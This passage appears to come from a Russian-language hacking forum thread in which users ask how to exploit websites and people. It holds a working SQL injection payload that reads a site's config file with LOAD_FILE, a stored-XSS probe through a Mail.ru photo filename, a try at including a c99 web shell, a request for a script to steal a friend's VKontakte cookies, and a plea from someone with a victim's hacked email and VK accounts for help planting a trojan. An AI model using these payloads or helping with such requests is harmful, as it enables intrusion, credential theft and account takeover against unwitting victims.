есть, но нуль-байт экранизируется ковычками. Если бы мэджик квотс было бы офф - удалось бы реализовать
Активка на мейле? - логонимся на мейл.ру - идем в Фото http://foto.mail.ru/ - берем картинку в формате JPEG, переименовываем в xss<hr>.jpg - заливаем http://foto.mail.ru/cgi-bin/photo/addphoto -- ставим галку Использовать имя файла как название фото - идем в альбом, зрим загруженную картинку, тыкаем Показать фото другу, вписываем мыльик и отправлем - идем в ящик, видим, что тег <hr> не вырезался .. собственно вопрос - заюзать можно, или фильтрация (да, там фильтрация все-же есть) слишком сильная?
возможно, проверь сам или стукни мне в аську - когда буду онлан ХР - неопасный тег, возможно (скорее всего) он не фильтруется, а опасные фильтруются
Вот вопросик: по запросу www.site.ru/id=1' выдаёт Notice: Undefined index: controller in /home/virtwww/w_new-la2life_fec2852b/http/cake/dispatcher.php on line 168 (В шапке) (на странице) можно с этим чё сделать?)
На запрос videos.php?cat_id=28' Отвечает: Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3 Что можно предпринять?
videos.php?cat_id=28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* {4} вывод. _http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* и там еще кусочек файла прочитать можно _http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F7777772F68746D6C2F736974652F636F6E662F636F6E6669672E706870),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* все благодаря SIPT думаю я сайт угадал)
Parse error: syntax error, unexpected $end in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php(69) : regexp code on line 1 Fatal error: preg_replace(): Failed evaluating code: check_module('main', ' ', 'format:\') in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php on line 69 ДАную ошибку как можно использовать?
У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?
Rejjin, эээ...ты хоть напиши что в index.php на эту переменную о_О, а то можно написать и такое, что по этому запросу будет голая жопа во весь экран Вообщем, всё скрипта зависит.
Да боже мой. Каким боком ты собрался инклудить файл, расположенный у тебя на машине?? localhost - это твой локальный адрес, доступный только с твоего компьютера... Мда (с) Помешает отсутствие мозгов. Причём сильно.
Всем доброе время суток!вот в чём вопрос,мне нужно скрипт который запишет куки в отдельный файл жертвы которая перешла на эту страницу.Например:Я бросаю Вконтакте ссылку другу,говорю типа глянь какие тёлки, он переходит и его куки переходят ко мне.спс за помощь
без уязвимости xss, ты куки не сможешь сохранить на своём сервере. Только реферер (из относящихся к сайту), который ты и атк знаешь. Если есть xss, то гугли на кейворд php сниффер
Сразу извиняюсь, если не туда пишу . Есть доступ к майлу жертвы .Человек не знает , что его ящик взломан .Так же есть полный доступ к странице вконтакте .Можно ли как , то попасть на компьютер жертвы (залезть в него) .Залить троян на маил (отправить от лица жертве самому себе) или еще как то ?